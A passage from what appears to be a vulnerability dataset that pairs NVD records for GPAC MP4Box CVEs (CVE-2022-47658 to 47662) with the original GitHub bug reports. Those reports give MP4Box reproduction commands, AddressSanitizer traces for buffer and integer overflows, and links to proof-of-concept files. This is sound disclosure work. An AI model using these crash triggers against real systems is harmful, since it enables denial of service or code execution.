not enough bits in bitstream ! [HEVC] Error parsing NAL unit type 33 [HEVC] Error parsing Sequence Param Set [HEVC] 51 layers in VPS but only 4 supported in GPAC [HEVC] Error parsing NAL unit type 32 [HEVC] Error parsing Video Param Set [HEVC] Error parsing NAL unit type 33 [HEVC] Error parsing NAL unit type 32 [HEVC] Error parsing Video Param Set [HEVC] Error parsing NAL unit type 33 [HEVC] Error parsing Sequence Param Set [HEVC] Error parsing NAL unit type 33 [HEVC] Error parsing Sequence Param Set Track Importing HEVC - Width 1 Height 6 FPS 25000/1000 [HEVC] 56 layers in VPS but only 4 supported in GPAC [HEVC] Error parsing NAL unit type 32 [HEVC] Error parsing Video Param Set media_tools/av_parsers.c:7662:23: runtime error: index 56 out of bounds for type 'u32 [4]' ``` # POC [poc_bof12.zip](https://github.com/gpac/gpac/files/10251497/poc_bof12.zip) # Impact Potentially causing DoS and RCE # Credit Xdchase
buffer overflow in function hevc_parse_vps_extension of media_tools/av_parsers.c:7662
https://api.github.com/repos/gpac/gpac/issues/2355/comments
0
2022-12-17T10:31:33Z
2022-12-17T11:29:28Z
https://github.com/gpac/gpac/issues/2355
1,501,315,271
2,355
4,591
CVE-2022-47658
2023-01-05T16:15:10.447
GPAC MP4Box 2.1-DEV-rev644-g5c4df2a67 is vulnerable to buffer overflow in function gf_hevc_read_vps_bs_internal of media_tools/av_parsers.c:8039
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2356" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2356" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "B4D3D58A-C3C9-4441-A84A-FB91FD19985C", "versionEndExcluding": "2.2.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/gpac/gpac/issues/2356
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [X] I looked for a similar issue and couldn't find any. - [X] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [X] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ # Description buffer overflow in function gf_hevc_read_vps_bs_internal of media_tools/av_parsers.c:8039 # Version info latest version atm ``` MP4Box - GPAC version 2.1-DEV-rev644-g5c4df2a67-master (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --enable-sanitizer Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` # Reproduce compile and run ``` ./configure --enable-sanitizer make ./MP4Box import -cat poc_bof10.mp4 ``` Crash reported by sanitizer ``` [Core] exp-golomb read failed, not enough bits in bitstream ! [HEVC] Error parsing NAL unit type 33 [HEVC] Error parsing Sequence Param Set [HEVC] Error parsing NAL unit type 32 [HEVC] 8 layers in VPS but only 4 supported in GPAC [HEVC] Error parsing NAL unit type 32 [HEVC] Error parsing Video Param Set [HEVC] Error parsing NAL unit type 33 Track Importing HEVC - Width 1 Height 6 FPS 488447261/488447261 [HEVC] Error parsing NAL unit type 390) [HEVC] SEI user message type 249 size error (109 but 15 remain), skipping SEI message media_tools/av_parsers.c:8039:32: runtime error: index 4 out of bounds for type 'u8 [4]' ``` # POC [poc_bof10.zip](https://github.com/gpac/gpac/files/10251487/poc_bof10.zip) # Impact Potentially causing DoS and RCE # Credit Xdchase
buffer overflow in function gf_hevc_read_vps_bs_internal of media_tools/av_parsers.c:8039
https://api.github.com/repos/gpac/gpac/issues/2356/comments
0
2022-12-17T10:31:37Z
2022-12-17T11:29:29Z
https://github.com/gpac/gpac/issues/2356
1,501,315,341
2,356
4,592
CVE-2022-47659
2023-01-05T16:15:10.670
GPAC MP4box 2.1-DEV-rev644-g5c4df2a67 is vulnerable to Buffer Overflow in gf_bs_read_data
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2354" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2354" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "B4D3D58A-C3C9-4441-A84A-FB91FD19985C", "versionEndExcluding": "2.2.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/gpac/gpac/issues/2354
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [X] I looked for a similar issue and couldn't find any. - [X] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [X] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ # Description stack-buffer-overflow utils/bitstream.c:732 in gf_bs_read_data # Version info latest version atm ``` MP4Box - GPAC version 2.1-DEV-rev644-g5c4df2a67-master (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --enable-sanitizer Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` # Reproduce compile and run ``` ./configure --enable-sanitizer make ./MP4Box import -cat poc_bof11.mp4 ``` Crash reported by sanitizer ``` Track Importing AAC - SampleRate 88200 Num Channels 8 ================================================================= ==325854==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffc52ec0940 at pc 0x7fa1e477c501 bp 0x7ffc52ebf3a0 sp 0x7ffc52ebf390 WRITE of size 1 at 0x7ffc52ec0940 thread T0 #0 0x7fa1e477c500 in gf_bs_read_data utils/bitstream.c:732 #1 0x7fa1e59d0a8c in latm_dmx_sync_frame_bs filters/reframe_latm.c:170 #2 0x7fa1e59d289f in latm_dmx_sync_frame_bs filters/reframe_latm.c:86 #3 0x7fa1e59d289f in latm_dmx_process filters/reframe_latm.c:526 #4 0x7fa1e55eabac in gf_filter_process_task filter_core/filter.c:2795 #5 0x7fa1e55aa703 in gf_fs_thread_proc filter_core/filter_session.c:1859 #6 0x7fa1e55b700e in gf_fs_run filter_core/filter_session.c:2120 #7 0x7fa1e4ff9a21 in gf_media_import media_tools/media_import.c:1551 #8 0x55a84c1ccb4c in import_file /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/fileimport.c:1498 #9 0x55a84c1d75d7 in cat_isomedia_file /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/fileimport.c:2536 #10 0x55a84c181130 in do_add_cat /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:4562 #11 0x55a84c181130 in mp4box_main /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:6124 #12 0x7fa1e2580d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58 #13 0x7fa1e2580e3f in __libc_start_main_impl ../csu/libc-start.c:392 #14 0x55a84c15dcb4 in _start (/home/sumuchuan/Desktop/gpac_fuzz/gpac/bin/gcc/MP4Box+0xabcb4) Address 0x7ffc52ec0940 is located in stack of thread T0 at offset 5088 in frame #0 0x7fa1e59d20af in latm_dmx_process filters/reframe_latm.c:456 This frame has 19 object(s): [48, 52) 'pck_size' (line 461) [64, 68) 'latm_frame_size' (line 525) [80, 84) 'dsi_s' (line 312) [96, 104) 'output' (line 460) [128, 136) 'dsi_b' (line 311) [160, 184) '<unknown>' [224, 248) '<unknown>' [288, 312) '<unknown>' [352, 376) '<unknown>' [416, 440) '<unknown>' [480, 504) '<unknown>' [544, 568) '<unknown>' [608, 632) '<unknown>' [672, 696) '<unknown>' [736, 760) '<unknown>' [800, 824) '<unknown>' [864, 888) '<unknown>' [928, 952) '<unknown>' [992, 5088) 'latm_buffer' (line 524) <== Memory access at offset 5088 overflows this variable HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow utils/bitstream.c:732 in gf_bs_read_data Shadow bytes around the buggy address: 0x10000a5d00d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10000a5d00e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10000a5d00f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10000a5d0100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10000a5d0110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x10000a5d0120: 00 00 00 00 00 00 00 00[f3]f3 f3 f3 f3 f3 f3 f3 0x10000a5d0130: f3 f3 f3 f3 f3 f3 f3 f3 00 00 00 00 00 00 00 00 0x10000a5d0140: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10000a5d0150: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10000a5d0160: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10000a5d0170: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==325854==ABORTING ``` # POC [poc_bof11.zip](https://github.com/gpac/gpac/files/10251498/poc_bof11.zip) # Impact Potentially causing DoS and RCE # Credit Xdchase
stack-buffer-overflow utils/bitstream.c:732 in gf_bs_read_data
https://api.github.com/repos/gpac/gpac/issues/2354/comments
0
2022-12-17T10:31:30Z
2022-12-17T11:29:28Z
https://github.com/gpac/gpac/issues/2354
1,501,315,203
2,354
4,593
CVE-2022-47660
2023-01-05T16:15:10.890
GPAC MP4Box 2.1-DEV-rev644-g5c4df2a67 is has an integer overflow in isomedia/isom_write.c
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2357" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2357" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "B4D3D58A-C3C9-4441-A84A-FB91FD19985C", "versionEndExcluding": "2.2.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "190" ]
190
https://github.com/gpac/gpac/issues/2357
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [X] I looked for a similar issue and couldn't find any. - [X] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [X] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ # Description integer overflow in isomedia/isom_write.c:4931 # Version info latest version atm ``` MP4Box - GPAC version 2.1-DEV-rev644-g5c4df2a67-master (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --enable-sanitizer Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` # Reproduce compile and run ``` ./configure --enable-sanitizer make ./MP4Box import -cat iof.mp4 ``` Crash reported by sanitizer ``` [HEVC] Error parsing NAL unit type 33 [HEVC] Error parsing NAL unit type 32 [HEVC] Invalid log2_max_pic_order_cnt_lsb_minus4 80, max shall be 12 [HEVC] Error parsing NAL unit type 33 [HEVC] Error parsing Sequence Param Set [HEVC] Error parsing NAL unit type 34 [HEVC] Error parsing NAL unit type 0 Track Importing HEVC - Width 1 Height 6 FPS 488447261/488447261 [HEVC] Error parsing NAL unit type 25 [HEVC] NAL Unit type 25 not handled - adding [HEVC] Error parsing NAL unit type 32 [HEVC] Invalid log2_max_pic_order_cnt_lsb_minus4 80, max shall be 12 [HEVC] Error parsing NAL unit type 33 [HEVC] Error parsing Sequence Param Set [HEVC] Error parsing NAL unit type 34 [HEVC] Error parsing NAL unit type 0 [HEVC] Error parsing NAL unit type 32 isomedia/isom_write.c:4931:87: runtime error: signed integer overflow: 1852736474 - -1953749291 cannot be represented in type 'int' ``` # POC [iof.zip](https://github.com/gpac/gpac/files/10251484/iof.zip) # Impact Potentially causing DoS and RCE # Credit Xdchase
integer overflow in isomedia/isom_write.c:4931
https://api.github.com/repos/gpac/gpac/issues/2357/comments
0
2022-12-17T10:31:40Z
2022-12-17T11:29:29Z
https://github.com/gpac/gpac/issues/2357
1,501,315,390
2,357
4,594
CVE-2022-47661
2023-01-05T16:15:11.103
GPAC MP4Box 2.1-DEV-rev649-ga8f438d20 is vulnerable to Buffer Overflow via media_tools/av_parsers.c:4988 in gf_media_nalu_add_emulation_bytes
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2358" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2358" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "B4D3D58A-C3C9-4441-A84A-FB91FD19985C", "versionEndExcluding": "2.2.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/gpac/gpac/issues/2358
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
- [X] I looked for a similar issue and couldn't find any. - [X] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [X] I give enough information for contributors to reproduce my issue (meaningful title, github labels, # Description heap-buffer-overflow media_tools/av_parsers.c:4988 in gf_media_nalu_add_emulation_bytes # Version info latest version atm ``` MP4Box - GPAC version 2.1-DEV-rev649-ga8f438d20-master (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --enable-sanitizer Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` # Reproduce compile and run ``` ./configure --enable-sanitizer make ./MP4Box import -catx poc_bof14.mp4 ``` Crash reported by sanitizer ``` [AVC|H264] Error parsing NAL unit type 8 [AVC|H264] Error parsing Picture Param Set [avc-h264] SEI user message type 71 size error (71 but 27 remain), keeping full SEI untouched [AVC|H264] Error parsing NAL unit type 8 [AVC|H264] Error parsing Picture Param Set [AVC|H264] Error parsing NAL unit type 8 [AVC|H264] Error parsing Picture Param Set [avc-h264] SEI user message has less than 2 bytes remaining but no end of sei found ================================================================= ==745696==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x615000014780 at pc 0x7f373f26d683 bp 0x7ffd5a01c290 sp 0x7ffd5a01c280 WRITE of size 1 at 0x615000014780 thread T0 #0 0x7f373f26d682 in gf_media_nalu_add_emulation_bytes media_tools/av_parsers.c:4988 #1 0x7f373f26d682 in gf_avc_reformat_sei media_tools/av_parsers.c:6355 #2 0x7f373fccee25 in naludmx_push_prefix filters/reframe_nalu.c:2398 #3 0x7f373fcee8ac in naludmx_parse_nal_avc filters/reframe_nalu.c:2821 #4 0x7f373fcee8ac in naludmx_process filters/reframe_nalu.c:3333 #5 0x7f373f8a5f1d in gf_filter_process_task filter_core/filter.c:2815 #6 0x7f373f8655a3 in gf_fs_thread_proc filter_core/filter_session.c:1859 #7 0x7f373f871ece in gf_fs_run filter_core/filter_session.c:2120 #8 0x7f373f2b49c1 in gf_media_import media_tools/media_import.c:1551 #9 0x55b1ec0f1b4c in import_file /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/fileimport.c:1498 #10 0x55b1ec0fc5d7 in cat_isomedia_file /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/fileimport.c:2536 #11 0x55b1ec0a6130 in do_add_cat /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:4562 #12 0x55b1ec0a6130 in mp4box_main /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:6124 #13 0x7f373c83bd8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58 #14 0x7f373c83be3f in __libc_start_main_impl ../csu/libc-start.c:392 #15 0x55b1ec082cb4 in _start (/home/sumuchuan/Desktop/gpac_fuzz/gpac/bin/gcc/MP4Box+0xabcb4) 0x615000014780 is located 0 bytes to the right of 512-byte region [0x615000014580,0x615000014780) allocated by thread T0 here: #0 0x7f37423a4867 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145 #1 0x7f373ea2c72a in gf_bs_new utils/bitstream.c:154 #2 0x7f373f26c993 in gf_avc_reformat_sei media_tools/av_parsers.c:6227 #3 0x7f373fccee25 in naludmx_push_prefix filters/reframe_nalu.c:2398 #4 0x7f373fcee8ac in naludmx_parse_nal_avc filters/reframe_nalu.c:2821 #5 0x7f373fcee8ac in naludmx_process filters/reframe_nalu.c:3333 #6 0x7f373f8a5f1d in gf_filter_process_task filter_core/filter.c:2815 #7 0x7f373f8655a3 in gf_fs_thread_proc filter_core/filter_session.c:1859 #8 0x7f373f871ece in gf_fs_run filter_core/filter_session.c:2120 #9 0x7f373f2b49c1 in gf_media_import media_tools/media_import.c:1551 #10 0x55b1ec0f1b4c in import_file /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/fileimport.c:1498 #11 0x55b1ec0fc5d7 in cat_isomedia_file /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/fileimport.c:2536 #12 0x55b1ec0a6130 in do_add_cat /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:4562 #13 0x55b1ec0a6130 in mp4box_main /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:6124 #14 0x7f373c83bd8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58 SUMMARY: AddressSanitizer: heap-buffer-overflow media_tools/av_parsers.c:4988 in gf_media_nalu_add_emulation_bytes Shadow bytes around the buggy address: 0x0c2a7fffa8a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2a7fffa8b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2a7fffa8c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2a7fffa8d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2a7fffa8e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c2a7fffa8f0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2a7fffa900: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2a7fffa910: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2a7fffa920: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2a7fffa930: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2a7fffa940: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==745696==ABORTING ``` if compile without ASAN and run the same poc ``` ./configure --static-bin make ./MP4Box import -catx poc_bof14.mp4 ``` The crash will happen at another place ``` [AVC|H264] Error parsing NAL unit type 8 [AVC|H264] Error parsing Picture Param Set [avc-h264] SEI user message type 71 size error (71 but 27 remain), keeping full SEI untouched [AVC|H264] Error parsing NAL unit type 8 [AVC|H264] Error parsing Picture Param Set [AVC|H264] Error parsing NAL unit type 8 [AVC|H264] Error parsing Picture Param Set [avc-h264] SEI user message has less than 2 bytes remaining but no end of sei found [avc-h264] invalid SPS: log2_max_frame_num_minus4 shall be less than 12, but is 16962257 [AVC|H264] Error parsing NAL unit type 7 [AVC|H264] Error parsing NAL unit type 8 [AVC|H264] Error parsing Picture Param Set [avc-h264] SEI user message type 16 size error (45 but 7 remain), keeping full SEI untouched [avc-h264] invalid SPS: log2_max_frame_num_minus4 shall be less than 12, but is 32527 [AVC|H264] Error parsing NAL unit type 7 [AVC|H264] Error parsing NAL unit type 8 [AVC|H264] Error parsing Picture Param Set [AVC|H264] Error parsing NAL unit type 8 [AVC|H264] Error parsing Picture Param Set [AVC|H264] Error parsing NAL unit type 8 [AVC|H264] Error parsing Picture Param Set [avc-h264] invalid SPS: log2_max_frame_num_minus4 shall be less than 12, but is 16964897 [AVC|H264] Error parsing NAL unit type 7 [avc-h264] Unknown aspect_ratio_idc: your video may have a wrong aspect ratio. Contact the GPAC team! [avc-h264] invalid SPS: log2_max_frame_num_minus4 shall be less than 12, but is 63 [AVC|H264] Error parsing NAL unit type 7 [avc-h264] Unknown aspect_ratio_idc: your video may have a wrong aspect ratio. Contact the GPAC team! realloc(): invalid next size Aborted ``` `realloc(): invalid next size` indicates that there was a bof on heap indeed, overwriting the size field of a heap chunk. # POC [poc_bof14.zip](https://github.com/gpac/gpac/files/10253586/poc_bof14.zip) # Impact Potentially causing DoS and RCE # Credit Xdchase
heap-buffer-overflow media_tools/av_parsers.c:4988 in gf_media_nalu_add_emulation_bytes
https://api.github.com/repos/gpac/gpac/issues/2358/comments
0
2022-12-18T10:23:38Z
2022-12-19T11:26:12Z
https://github.com/gpac/gpac/issues/2358
1,501,850,698
2,358
4,595
CVE-2022-47662
2023-01-05T16:15:11.400
GPAC MP4Box 2.1-DEV-rev649-ga8f438d20 has a segment fault (/stack overflow) due to infinite recursion in Media_GetSample isomedia/media.c:662
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2359" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2359" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "B4D3D58A-C3C9-4441-A84A-FB91FD19985C", "versionEndExcluding": "2.2.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "674" ]
674
